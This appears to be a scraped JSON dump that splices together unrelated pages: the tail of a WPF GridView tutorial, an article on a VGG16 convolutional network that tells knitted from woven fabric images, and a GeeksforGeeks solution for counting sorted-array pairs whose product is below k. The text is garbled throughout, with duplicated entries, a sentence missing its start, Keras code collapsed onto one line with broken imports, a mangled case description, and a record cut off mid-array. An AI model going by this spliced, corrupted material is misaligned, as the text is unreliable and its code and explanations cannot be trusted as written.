target. (Inherited from UIElement)" }, { "code": null, "e": 6437, "s": 6425, "text": "ImageFailed" }, { "code": null, "e": 6510, "s": 6437, "text": "Occurs when there is an error associated with image retrieval or format." }, { "code": null, "e": 6522, "s": 6510, "text": "ImageOpened" }, { "code": null, "e": 6668, "s": 6522, "text": "Occurs when the image source is downloaded and decoded with no failure. You can use this event to determine the natural size of the image source." }, { "code": null, "e": 6676, "s": 6668, "text": "KeyDown" }, { "code": null, "e": 6772, "s": 6676, "text": "Occurs when a keyboard key is pressed while the UIElement has focus. (Inherited from UIElement)" }, { "code": null, "e": 6778, "s": 6772, "text": "KeyUp" }, { "code": null, "e": 6868, "s": 6778, "text": "when a keyboard key is released while the UIElement has focus. (Inherited from UIElement)" }, { "code": null, "e": 6876, "s": 6868, "text": "Arrange" }, { "code": null, "e": 7137, "s": 6876, "text": "Positions child objects and determines a size for a UIElement. Parent objects that implement custom layout for their child elements should call this method from their layout override implementations to form a recursive layout update. (Inherited from UIElement)" }, { "code": null, "e": 7148, "s": 7137, "text": "ClearValue" }, { "code": null, "e": 7231, "s": 7148, "text": "Clears the local value of a dependency property. (Inherited from DependencyObject)" }, { "code": null, "e": 7240, "s": 7231, "text": "FindName" }, { "code": null, "e": 7334, "s": 7240, "text": "Retrieves an object that has the specified identifier name. (Inherited from FrameworkElement)" }, { "code": null, "e": 7343, "s": 7334, "text": "GetValue" }, { "code": null, "e": 7463, "s": 7343, "text": "Returns the current effective value of a dependency property from a DependencyObject. (Inherited from DependencyObject)" }, { "code": null, "e": 7478, "s": 7463, "text": "ReadLocalValue" }, { "code": null, "e": 7587, "s": 7478, "text": "Returns the local value of a dependency property, if a local value is set. (Inherited from DependencyObject)" }, { "code": null, "e": 7598, "s": 7587, "text": "SetBinding" }, { "code": null, "e": 7709, "s": 7598, "text": "Attaches a binding to a FrameworkElement, using the provided binding object. (Inherited from FrameworkElement)" }, { "code": null, "e": 7718, "s": 7709, "text": "SetValue" }, { "code": null, "e": 7821, "s": 7718, "text": "Sets the local value of a dependency property on a DependencyObject. (Inherited from DependencyObject)" }, { "code": null, "e": 7940, "s": 7821, "text": "Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView." }, { "code": null, "e": 8059, "s": 7940, "text": "Let’s take an example to understand the concept better. Start by creating a new WPF project with the name WPFGridView." }, { "code": null, "e": 8102, "s": 8059, "text": "Drag a grid view control from the Toolbox." }, { "code": null, "e": 8145, "s": 8102, "text": "Drag a grid view control from the Toolbox." }, { "code": null, "e": 8202, "s": 8145, "text": "The following example shows the data in grid like table." }, { "code": null, "e": 8259, "s": 8202, "text": "The following example shows the data in grid like table." }, { "code": null, "e": 8318, "s": 8259, "text": "The following XAML code creates and implements a GridView." }, { "code": null, "e": 8377, "s": 8318, "text": "The following XAML code creates and implements a GridView." }, { "code": null, "e": 9302, "s": 8377, "text": "<Window x:Class = \"WPFGridView.MainWindow\" \n xmlns = \"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" \n xmlns:x = \"http://schemas.microsoft.com/winfx/2006/xaml\" \n Title = \"MainWindow\" Height = \"350\" Width = \"525\">\n\t\n <Grid> \n <ListView HorizontalAlignment = \"Left\" Height = \"299\" Margin = \"10,10,0,0\" \n VerticalAlignment = \"Top\" Width = \"497\"Name = \"MenList\">\n\t\t\t\n <ListView.View>\n <GridView> \n <GridViewColumn Header = \"Name\" DisplayMemberBinding = \"{Binding Name}\" \n Width = \"100\"/> \n\t\t\t\t\t\t\n <GridViewColumn Header = \"ID\" DisplayMemberBinding = \"{Binding ID}\" \n Width = \"100\"/>\n\t\t\t\t\t\t\n <GridViewColumn Header = \"Age\" DisplayMemberBinding = \"{Binding Age}\" \n Width = \"100\"/>\n\t\t\t\t\t\t\n </GridView> \n </ListView.View>\n\t\t\t\n </ListView> \n </Grid> \n\t\n</Window>" }, { "code": null, "e": 9370, "s": 9302, "text": "Here is the C# implementation in which person class is implemented." }, { "code": null, "e": 10075, "s": 9370, "text": "using System; \nusing System.Windows; \nusing System.Windows.Controls;\n \nnamespace WPFGridView { \n /// <summary> \n /// Interaction logic for MainWindow.xaml \n /// </summary> \n\t\n public partial class MainWindow : Window { \n\t\n public MainWindow() { \n InitializeComponent(); \n\t\t\t\n MenList.Items.Add(new Person() {Name = \"Ali\", ID = \"123A\", Age = 20 }); \n MenList.Items.Add(new Person() {Name = \"Akram\",ID= \"456X\", Age = 35 }); \n MenList.Items.Add(new Person() {Name = \"Salman\",ID=\"333E\", Age = 49 }); \n } \n }\n\t\n class Person { \n public string Name { get; set; } \n public string ID { get; set; } \n public int Age { get; set; } \n } \n\t\n}" }, { "code": null, "e": 10158, "s": 10075, "text": "When you compile and execute the above code, it will produce the following output." }, { "code": null, "e": 10264, "s": 10158, "text": "We recommend that you execute the above example code and try the other properties and events of GridView." }, { "code": null, "e": 10299, "s": 10264, "text": "\n 31 Lectures \n 2.5 hours \n" }, { "code": null, "e": 10313, "s": 10299, "text": " Anadi Sharma" }, { "code": null, "e": 10348, "s": 10313, "text": "\n 30 Lectures \n 2.5 hours \n" }, { "code": null, "e": 10371, "s": 10348, "text": " Taurius Litvinavicius" }, { "code": null, "e": 10378, "s": 10371, "text": " Print" }, { "code": null, "e": 10389, "s": 10378, "text": " Add Notes" } ]
AI for Textiles — Convolutional Neural Network Based Fabric Structure Classifier | by Yasith Sanura Perera | Towards Data Science
Today, deep learning is used in a wide variety of artificial intelligence applications including facial recognition, natural language processing and so on. It is possible to find a number of applications of deep learning in the field of textile engineering as well, and computer vision has widely been used in this context. This article describes the approach used in developing a convolutional neural network for identifying fabric structures from input images of fabric surfaces. The developed model is capable of successfully distinguishing between knitted and woven fabric structures. Knitted and woven structures can easily be distinguished due to their structural differences. The loop structure of knitted fabrics and the interlacing warp and weft yarns on woven fabrics allow the easy identification of the two structures. If a neural network can be trained to learn these features that are inherent to the fabric structures, by showing a set of labelled knitted and woven fabric images, then the neural network would be able to correctly distinguish between knitted and woven fabric images, that it has never seen before. In order to implement this, a convolutional neural network (CNN) architecture was decided to be used, as CNNs are capable of effectively extracting features from images. The model was developed using python with the TensorFlow framework and Keras API. To obtain a dataset for training the neural network, an open source database of images available on, https://ibug.doc.ic.ac.uk/resources/fabrics/ was used, which was originally prepared for a research (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016). The fabric images in this original data set were labelled according to the type of material (i.e. nylon, polyester, cotton, etc.). Therefore, before training, a total of 4300 images were selected from this original data set and manually labelled them according to the fabric structure (i.e. Knitted and Woven). Out of the 4300 images, 4200 were used as training data, while the remaining 100 were used as validation data. (Even though the validation data set was too small, majority of the images were used for training to avoid overfitting). Both the training and validation data sets consisted of an equal number of knitted and woven fabric images. Initially, the transfer learning technique was decided to be used. Therefore, the VGG16 architecture (https://arxiv.org/abs/1409.1556) was used with pre-trained weights. Only the final output layer was changed to be a softmax layer with two units. Using transfer learning, the final output layer was trained, keeping the weights of the other layers frozen, and after 100 epochs, the training and validation accuracy reached 88% and 83% respectively. To improve the model, the final three dense layers of the original VGG16 architecture were removed, and replaced by a couple of slightly modified dense layers. Using transfer learning, these newly added layers were trained while keeping the weights of the remaining layers frozen. The model reached a maximum training accuracy of 99.81% and a validation accuracy of 91%. The model was now clearly overfitting to the training data. To overcome the overfitting problem, again the final dense layers of the model were trained with a dropout layer added between the last two dense layers, along with data augmentation. However, after 20 epochs, the model reached a training accuracy of 84.55% and a validation accuracy of 84% and didn’t seem to be further improving. The overfitting problem was overcome, but now the model was having high bias. Finally, it was decided to train the entire model, instead of using transfer learning. However, since the amount of training data available was limited, it was decided to reduce the complexity of the original VGG16 architecture. Hence, the fifth convolutional block of the original VGG16 architecture was removed and an average pooling layer was added, followed by the two dense layers. To avoid overfitting, data augmentation was used with several augmentation techniques such as rotating, vertical flipping, zooming and different brightness levels (https://keras.io/api/preprocessing/image/). Rotation of the input images is important as it allows the model to identify the wales of knitted fabric images and warp and weft yarns in woven fabric images, that are oriented in different directions, due to the variations that occur when capturing the images. Zooming in on the images allows the model to clearly identify the loop structure of knitted fabrics and the interlacing pattern of woven fabrics. import numpy as np;import keras;from keras.layers import AveragePooling2D;from keras. layers.core import Dense, Flatten;from keras.optimizers import Adam;from keras.metrics import binary_crossentropy;from keras.preprocessing.image import ImageDataGenerator;from keras.models import Model;from keras.applications import imagenet_utils;from keras.callbacks import ModelCheckpoint;train_data_path = '/content/drive/My Drive/fabric_data/Train';test_data_path = '/content/drive/My Drive/fabric_data/Test';train_data = ImageDataGenerator(rescale = 1.0/255, rotation_range = 180, vertical_flip = True, horizontal_flip = True, brightness_range = [0.5, 1.5], zoom_range = [1, 1.5]);train_generator = train_data.flow_from_directory(directory = train_data_path, target_size = (224,224), classes = ['Woven','Knitted'], batch_size = 70, shuffle = True);test_data = ImageDataGenerator(rescale = 1.0/255);test_generator = test_data.flow_from_directory(directory = test_data_path, target_size = (224,224), classes = ['Woven', 'Knitted'], batch_size = 50, shuffle = False);vgg16_model = keras.applications.VGG16();x = vgg16_model.layers[-9].output;x = AveragePooling2D(pool_size = (2,2))(x);x = Flatten(name="flatten")(x);x = Dense(128, activation = 'relu')(x);x = Dense(2, activation = 'softmax')(x);model = Model(inputs = vgg16_model.input, outputs = x);model.compile(optimizer = Adam(lr=0.00001, clipvalue = 0.5, clipnorm = 1), loss = 'binary_crossentropy', metrics = ['accuracy']);print("\nTraining.....");checkpoint = ModelCheckpoint(filepath = '/content/drive/My Drive/new_fab_model.h5', monitor='val_accuracy', verbose=1, save_best_only=True, mode='max');history = model.fit_generator(generator = train_generator, steps_per_epoch = 60, validation_data = test_generator, validation_steps = 2, epochs = 250, verbose = 1, callbacks = [checkpoint]); The entire model was trained from scratch, using the Adam optimizer, at a learning rate of 0.00001. After 50 epochs of training, the model achieved a training accuracy of 98% and a validation accuracy of 97%. Since the validation data set used was too small (only 100 images), in order to further validate the model’s performance in the real world, a different set of 100 fabric images were tested using the trained model. The model predicted 97 of those images correctly. The significance of this new test sample is that, the images were taken from a completely different distribution to the original training and validation data. One set of images were downloaded off the internet (3D knitted fabric images). The other set of images were scanned using a scanner and the images were zoomed in by 50%, cropped out and resized into 224x224 pixels to feed the neural network. The fabric images of the original training and validation data sets had been captured using a photometric stereo sensor (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016). It should be noted that the training data for the model consisted of weft knitted fabrics only. Only technical front images of single jersey knitted structures were available and no 3D knitted structures were included. However, the trained model was capable of correctly predicting 3D cable knitted structures and it correctly predicted some of the single jersey technical back images as well. Most of the woven fabric images in the training set consisted of plain and twill structures. Intermediate activations of the trained model were visualized to understand how the convolutions learn features from the fabric images. A knitted fabric image is fed to the model as the input and the corresponding layer activations are shown below. Please note that only some of the convolutions of a few layers are shown here. The initial layers of the model seem to be identifying the most basic features of the image, such as horizontal and vertical edges. Some of the convolutions have identified the edges of the wales on the knitted fabric surface. In the middle layers, the convolutions begin to extract much finer details such as the shape of the knitted loops and the max pooling layers are highlighting these features. The activations of the deepest layers are difficult to interpret visually, as they are encoding information specific to the fabric structure, according to what the model has learned during training. It should be noted that this model was developed for academic purposes only. The model is capable of distinguishing between two main fabric structures (i.e. Knitted and Woven) only. Distinguishing between several fabric structure variations such as single jersey, rib and interlock would be a more interesting task, but due to the unavailability of a large data set of such different types of fabric structures, the model was only limited to distinguishing between knitted and woven fabric structures. However, with sufficient data, a model can be trained for achieving such a task as well. It should further be noted that it may be possible to improve this model further, by using a different neural network architecture and more data.
[ { "code": null, "e": 761, "s": 172, "text": "Today, deep learning is used in a wide variety of artificial intelligence applications including facial recognition, natural language processing and so on. It is possible to find a number of applications of deep learning in the field of textile engineering as well, and computer vision has widely been used in this context. This article describes the approach used in developing a convolutional neural network for identifying fabric structures from input images of fabric surfaces. The developed model is capable of successfully distinguishing between knitted and woven fabric structures." }, { "code": null, "e": 1473, "s": 761, "text": "Knitted and woven structures can easily be distinguished due to their structural differences. The loop structure of knitted fabrics and the interlacing warp and weft yarns on woven fabrics allow the easy identification of the two structures. If a neural network can be trained to learn these features that are inherent to the fabric structures, by showing a set of labelled knitted and woven fabric images, then the neural network would be able to correctly distinguish between knitted and woven fabric images, that it has never seen before. In order to implement this, a convolutional neural network (CNN) architecture was decided to be used, as CNNs are capable of effectively extracting features from images." }, { "code": null, "e": 2600, "s": 1473, "text": "The model was developed using python with the TensorFlow framework and Keras API. To obtain a dataset for training the neural network, an open source database of images available on, https://ibug.doc.ic.ac.uk/resources/fabrics/ was used, which was originally prepared for a research (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016). The fabric images in this original data set were labelled according to the type of material (i.e. nylon, polyester, cotton, etc.). Therefore, before training, a total of 4300 images were selected from this original data set and manually labelled them according to the fabric structure (i.e. Knitted and Woven). Out of the 4300 images, 4200 were used as training data, while the remaining 100 were used as validation data. (Even though the validation data set was too small, majority of the images were used for training to avoid overfitting). Both the training and validation data sets consisted of an equal number of knitted and woven fabric images." }, { "code": null, "e": 3050, "s": 2600, "text": "Initially, the transfer learning technique was decided to be used. Therefore, the VGG16 architecture (https://arxiv.org/abs/1409.1556) was used with pre-trained weights. Only the final output layer was changed to be a softmax layer with two units. Using transfer learning, the final output layer was trained, keeping the weights of the other layers frozen, and after 100 epochs, the training and validation accuracy reached 88% and 83% respectively." }, { "code": null, "e": 3481, "s": 3050, "text": "To improve the model, the final three dense layers of the original VGG16 architecture were removed, and replaced by a couple of slightly modified dense layers. Using transfer learning, these newly added layers were trained while keeping the weights of the remaining layers frozen. The model reached a maximum training accuracy of 99.81% and a validation accuracy of 91%. The model was now clearly overfitting to the training data." }, { "code": null, "e": 3891, "s": 3481, "text": "To overcome the overfitting problem, again the final dense layers of the model were trained with a dropout layer added between the last two dense layers, along with data augmentation. However, after 20 epochs, the model reached a training accuracy of 84.55% and a validation accuracy of 84% and didn’t seem to be further improving. The overfitting problem was overcome, but now the model was having high bias." }, { "code": null, "e": 4895, "s": 3891, "text": "Finally, it was decided to train the entire model, instead of using transfer learning. However, since the amount of training data available was limited, it was decided to reduce the complexity of the original VGG16 architecture. Hence, the fifth convolutional block of the original VGG16 architecture was removed and an average pooling layer was added, followed by the two dense layers. To avoid overfitting, data augmentation was used with several augmentation techniques such as rotating, vertical flipping, zooming and different brightness levels (https://keras.io/api/preprocessing/image/). Rotation of the input images is important as it allows the model to identify the wales of knitted fabric images and warp and weft yarns in woven fabric images, that are oriented in different directions, due to the variations that occur when capturing the images. Zooming in on the images allows the model to clearly identify the loop structure of knitted fabrics and the interlacing pattern of woven fabrics." }, { "code": null, "e": 7071, "s": 4895, "text": "import numpy as np;import keras;from keras.layers import AveragePooling2D;from keras. layers.core import Dense, Flatten;from keras.optimizers import Adam;from keras.metrics import binary_crossentropy;from keras.preprocessing.image import ImageDataGenerator;from keras.models import Model;from keras.applications import imagenet_utils;from keras.callbacks import ModelCheckpoint;train_data_path = '/content/drive/My Drive/fabric_data/Train';test_data_path = '/content/drive/My Drive/fabric_data/Test';train_data = ImageDataGenerator(rescale = 1.0/255, rotation_range = 180, vertical_flip = True, horizontal_flip = True, brightness_range = [0.5, 1.5], zoom_range = [1, 1.5]);train_generator = train_data.flow_from_directory(directory = train_data_path, target_size = (224,224), classes = ['Woven','Knitted'], batch_size = 70, shuffle = True);test_data = ImageDataGenerator(rescale = 1.0/255);test_generator = test_data.flow_from_directory(directory = test_data_path, target_size = (224,224), classes = ['Woven', 'Knitted'], batch_size = 50, shuffle = False);vgg16_model = keras.applications.VGG16();x = vgg16_model.layers[-9].output;x = AveragePooling2D(pool_size = (2,2))(x);x = Flatten(name=\"flatten\")(x);x = Dense(128, activation = 'relu')(x);x = Dense(2, activation = 'softmax')(x);model = Model(inputs = vgg16_model.input, outputs = x);model.compile(optimizer = Adam(lr=0.00001, clipvalue = 0.5, clipnorm = 1), loss = 'binary_crossentropy', metrics = ['accuracy']);print(\"\\nTraining.....\");checkpoint = ModelCheckpoint(filepath = '/content/drive/My Drive/new_fab_model.h5', monitor='val_accuracy', verbose=1, save_best_only=True, mode='max');history = model.fit_generator(generator = train_generator, steps_per_epoch = 60, validation_data = test_generator, validation_steps = 2, epochs = 250, verbose = 1, callbacks = [checkpoint]);" }, { "code": null, "e": 7280, "s": 7071, "text": "The entire model was trained from scratch, using the Adam optimizer, at a learning rate of 0.00001. After 50 epochs of training, the model achieved a training accuracy of 98% and a validation accuracy of 97%." }, { "code": null, "e": 8258, "s": 7280, "text": "Since the validation data set used was too small (only 100 images), in order to further validate the model’s performance in the real world, a different set of 100 fabric images were tested using the trained model. The model predicted 97 of those images correctly. The significance of this new test sample is that, the images were taken from a completely different distribution to the original training and validation data. One set of images were downloaded off the internet (3D knitted fabric images). The other set of images were scanned using a scanner and the images were zoomed in by 50%, cropped out and resized into 224x224 pixels to feed the neural network. The fabric images of the original training and validation data sets had been captured using a photometric stereo sensor (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016)." }, { "code": null, "e": 8745, "s": 8258, "text": "It should be noted that the training data for the model consisted of weft knitted fabrics only. Only technical front images of single jersey knitted structures were available and no 3D knitted structures were included. However, the trained model was capable of correctly predicting 3D cable knitted structures and it correctly predicted some of the single jersey technical back images as well. Most of the woven fabric images in the training set consisted of plain and twill structures." }, { "code": null, "e": 9073, "s": 8745, "text": "Intermediate activations of the trained model were visualized to understand how the convolutions learn features from the fabric images. A knitted fabric image is fed to the model as the input and the corresponding layer activations are shown below. Please note that only some of the convolutions of a few layers are shown here." }, { "code": null, "e": 9673, "s": 9073, "text": "The initial layers of the model seem to be identifying the most basic features of the image, such as horizontal and vertical edges. Some of the convolutions have identified the edges of the wales on the knitted fabric surface. In the middle layers, the convolutions begin to extract much finer details such as the shape of the knitted loops and the max pooling layers are highlighting these features. The activations of the deepest layers are difficult to interpret visually, as they are encoding information specific to the fabric structure, according to what the model has learned during training." } ]
Count pairs in a sorted array whose product is less than k - GeeksforGeeks
06 May, 2021 Given a sorted integer array and number k, the task is to count pairs in an array whose product is less than x.Examples: Input: A = {2, 3, 5, 6}, k = 16 Output: 4 Pairs having product less than 16: (2, 3), (2, 5), (2, 6), (3, 5)Input: A = {2, 3, 4, 6, 9}, k = 20 Output: 6 Pairs having product less than 20: (2, 3), (2, 4), (2, 6), (2, 9), (3, 4), (3, 6) A simple solution of this problem run two loops to generate all pairs and one by one and check if current pair’s product is less than x or not.An Efficient solution of this problem is take initial and last value of index in l and r variable. Consider below two cases: Case-I: Lets consider i < j and A[i]*A[j] < k then we can say that A[i]*A[j-1] < k as A[j-1] < A[j] for a sorted array, Similarly A[i]*A[j-2] < k, A[i]*A[j-3] < k, ....., A[i]*A[i+1] < k. Case-II: Lets consider i k then we can say that A[i]*A[j+1] > k as A[j+1] > A[j] for a sorted array, similarly A[i]*A[j+2] > k, A[i]*A[j+3] > k, ....., A[i]*A[n-1] > k. Above problem is similar to Count pairs in a sorted array whose sum is less than x, the only thing that is different is to find the product of pairs instead of sum. Below is the algorithm to solve this problem: 1) Initialize two variables l and r to find the candidate elements in the sorted array. (a) l = 0 (b) r = n - 1 2) Initialize : result = 0 2) Loop while l < r. // If current left and current // right have product smaller than x, // the all elements from l+1 to r // form a pair with current (a) If (arr[l] * arr[r] < x) result = result + (r - l) l++; (b) Else r--; 3) Return result Below is the implementation of above algorithm: C++ Java Python C# PHP Javascript // C++ program to find number of pairs with// product less than k in a sorted array#include <bits/stdc++.h>using namespace std; // Function to count the pairsint fun(int A[], int n, int k){ // count to keep count of // number of pairs with product // less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than k // then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codeint main(){ int A[] = { 2, 3, 4, 6, 9 }; int n = sizeof(A) / sizeof(int); int k = 20; cout << "Number of pairs with product less than " << k << " = " << fun(A, n, k) << endl; return 0;} // Java program to find number// of pairs with product less// than k in a sorted arrayclass GFG{ // Function to count the pairsstatic int fun(int A[], int n, int k){ // count to keep count of // number of pairs with // product less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codepublic static void main(String args[]){ int A[] = {2, 3, 4, 6, 9}; int n = A.length; int k = 20; System.out.println("Number of pairs with " + "product less than 20 = " + fun(A, n, k));}} // This code is contributed// by Kirti_Mangal # Python program to find number of pairs with# product less than k in a sorted array def fun(A, k): # count to keep count of number # of pairs with product less than k count = 0 n = len(A) # Left pointer pointing to leftmost part i = 0 # Right pointer pointing to rightmost part j = n-1 # While left and right pointer don't meet while i < j: if A[i]*A[j] < k: count += (j-i) # Increment the left pointer i+= 1 else: # Decrement the right pointer j-= 1 return count # Driver code to test above functionA = [2, 3, 4, 6, 9]k = 20print("Number of pairs with product less than ",k, " = ", fun(A, k)) // C# program to find number// of pairs with product less// than k in a sorted arrayusing System; class GFG{ // Function to count the pairsstatic int fun(int []A, int n, int k){ // count to keep count of // number of pairs with // product less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codepublic static void Main(){ int []A = {2, 3, 4, 6, 9}; int n = A.Length; int k = 20; Console.WriteLine("Number of pairs with " + "product less than 20 = " + fun(A, n, k));}} // This code is contributed// by Subhadeep <?php// PHP program to find number of// pairs with product less than k// in a sorted array // Function to count the pairsfunction fun($A, $n, $k){ // count to keep count of // number of pairs with product // less than k $count = 0; $i = 0; $j = ($n - 1); // Traverse the array while ($i < $j) { // If product is less than k // then count that pair // and increment 'i' if ($A[$i] * $A[$j] < $k) { $count += ($j - $i); $i++; } // Else decrement 'j' else { $j--; } } // Return count of pairs return $count;} // Driver code$A = array( 2, 3, 4, 6, 9 );$n = sizeof($A);$k = 20;echo "Number of pairs with product less than ", $k , " = " , fun($A, $n, $k) , "\n"; // This code is contributed by ajit?> <script> // Javascript program to find number // of pairs with product less // than k in a sorted array // Function to count the pairs function fun(A, n, k) { // count to keep count of // number of pairs with // product less than k let count = 0; let i = 0; let j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count; } let A = [2, 3, 4, 6, 9]; let n = A.length; let k = 20; document.write("Number of pairs with " + "product less than 20 = " + fun(A, n, k)); </script> Number of pairs with product less than 20 = 6 Time Complexity: O(N) Kirti_Mangal tufan_gupta2000 jit_t divyesh072019 two-pointer-algorithm Arrays two-pointer-algorithm Arrays Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Maximum and minimum of an array using minimum number of comparisons Stack Data Structure (Introduction and Program) Top 50 Array Coding Problems for Interviews Multidimensional Arrays in Java Introduction to Arrays Linear Search Python | Using 2D arrays/lists the right way Linked List vs Array Queue | Set 1 (Introduction and Array Implementation) Find the Missing Number
[ { "code": null, "e": 25144, "s": 25116, "text": "\n06 May, 2021" }, { "code": null, "e": 25266, "s": 25144, "text": "Given a sorted integer array and number k, the task is to count pairs in an array whose product is less than x.Examples: " }, { "code": null, "e": 25502, "s": 25266, "text": "Input: A = {2, 3, 5, 6}, k = 16 Output: 4 Pairs having product less than 16: (2, 3), (2, 5), (2, 6), (3, 5)Input: A = {2, 3, 4, 6, 9}, k = 20 Output: 6 Pairs having product less than 20: (2, 3), (2, 4), (2, 6), (2, 9), (3, 4), (3, 6) " }, { "code": null, "e": 25773, "s": 25504, "text": "A simple solution of this problem run two loops to generate all pairs and one by one and check if current pair’s product is less than x or not.An Efficient solution of this problem is take initial and last value of index in l and r variable. Consider below two cases: " }, { "code": null, "e": 25961, "s": 25773, "text": "Case-I: Lets consider i < j and A[i]*A[j] < k then we can say that A[i]*A[j-1] < k as A[j-1] < A[j] for a sorted array, Similarly A[i]*A[j-2] < k, A[i]*A[j-3] < k, ....., A[i]*A[i+1] < k." }, { "code": null, "e": 26130, "s": 25961, "text": "Case-II: Lets consider i k then we can say that A[i]*A[j+1] > k as A[j+1] > A[j] for a sorted array, similarly A[i]*A[j+2] > k, A[i]*A[j+3] > k, ....., A[i]*A[n-1] > k." }, { "code": null, "e": 26343, "s": 26130, "text": "Above problem is similar to Count pairs in a sorted array whose sum is less than x, the only thing that is different is to find the product of pairs instead of sum. Below is the algorithm to solve this problem: " }, { "code": null, "e": 26820, "s": 26343, "text": "1) Initialize two variables l and r to find the candidate \n elements in the sorted array.\n (a) l = 0\n (b) r = n - 1\n2) Initialize : result = 0\n2) Loop while l < r.\n\n // If current left and current\n // right have product smaller than x,\n // the all elements from l+1 to r\n // form a pair with current\n (a) If (arr[l] * arr[r] < x) \n result = result + (r - l) \n l++; \n \n (b) Else\n r--;\n \n3) Return result" }, { "code": null, "e": 26870, "s": 26820, "text": "Below is the implementation of above algorithm: " }, { "code": null, "e": 26874, "s": 26870, "text": "C++" }, { "code": null, "e": 26879, "s": 26874, "text": "Java" }, { "code": null, "e": 26886, "s": 26879, "text": "Python" }, { "code": null, "e": 26889, "s": 26886, "text": "C#" }, { "code": null, "e": 26893, "s": 26889, "text": "PHP" }, { "code": null, "e": 26904, "s": 26893, "text": "Javascript" }, { "code": "// C++ program to find number of pairs with// product less than k in a sorted array#include <bits/stdc++.h>using namespace std; // Function to count the pairsint fun(int A[], int n, int k){ // count to keep count of // number of pairs with product // less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than k // then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codeint main(){ int A[] = { 2, 3, 4, 6, 9 }; int n = sizeof(A) / sizeof(int); int k = 20; cout << \"Number of pairs with product less than \" << k << \" = \" << fun(A, n, k) << endl; return 0;}", "e": 27797, "s": 26904, "text": null }, { "code": "// Java program to find number// of pairs with product less// than k in a sorted arrayclass GFG{ // Function to count the pairsstatic int fun(int A[], int n, int k){ // count to keep count of // number of pairs with // product less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codepublic static void main(String args[]){ int A[] = {2, 3, 4, 6, 9}; int n = A.length; int k = 20; System.out.println(\"Number of pairs with \" + \"product less than 20 = \" + fun(A, n, k));}} // This code is contributed// by Kirti_Mangal", "e": 28789, "s": 27797, "text": null }, { "code": "# Python program to find number of pairs with# product less than k in a sorted array def fun(A, k): # count to keep count of number # of pairs with product less than k count = 0 n = len(A) # Left pointer pointing to leftmost part i = 0 # Right pointer pointing to rightmost part j = n-1 # While left and right pointer don't meet while i < j: if A[i]*A[j] < k: count += (j-i) # Increment the left pointer i+= 1 else: # Decrement the right pointer j-= 1 return count # Driver code to test above functionA = [2, 3, 4, 6, 9]k = 20print(\"Number of pairs with product less than \",k, \" = \", fun(A, k))", "e": 29496, "s": 28789, "text": null }, { "code": "// C# program to find number// of pairs with product less// than k in a sorted arrayusing System; class GFG{ // Function to count the pairsstatic int fun(int []A, int n, int k){ // count to keep count of // number of pairs with // product less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codepublic static void Main(){ int []A = {2, 3, 4, 6, 9}; int n = A.Length; int k = 20; Console.WriteLine(\"Number of pairs with \" + \"product less than 20 = \" + fun(A, n, k));}} // This code is contributed// by Subhadeep", "e": 30481, "s": 29496, "text": null }, { "code": "<?php// PHP program to find number of// pairs with product less than k// in a sorted array // Function to count the pairsfunction fun($A, $n, $k){ // count to keep count of // number of pairs with product // less than k $count = 0; $i = 0; $j = ($n - 1); // Traverse the array while ($i < $j) { // If product is less than k // then count that pair // and increment 'i' if ($A[$i] * $A[$j] < $k) { $count += ($j - $i); $i++; } // Else decrement 'j' else { $j--; } } // Return count of pairs return $count;} // Driver code$A = array( 2, 3, 4, 6, 9 );$n = sizeof($A);$k = 20;echo \"Number of pairs with product less than \", $k , \" = \" , fun($A, $n, $k) , \"\\n\"; // This code is contributed by ajit?>", "e": 31329, "s": 30481, "text": null }, { "code": "<script> // Javascript program to find number // of pairs with product less // than k in a sorted array // Function to count the pairs function fun(A, n, k) { // count to keep count of // number of pairs with // product less than k let count = 0; let i = 0; let j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count; } let A = [2, 3, 4, 6, 9]; let n = A.length; let k = 20; document.write(\"Number of pairs with \" + \"product less than 20 = \" + fun(A, n, k)); </script>", "e": 32368, "s": 31329, "text": null }, { "code": null, "e": 32414, "s": 32368, "text": "Number of pairs with product less than 20 = 6" }, { "code": null, "e": 32440, "s": 32416, "text": "Time Complexity: O(N) " }, { "code": null, "e": 32453, "s": 32440, "text": "Kirti_Mangal" }, { "code": null, "e": 32469, "s": 32453, "text": "tufan_gupta2000" }, { "code": null, "e": 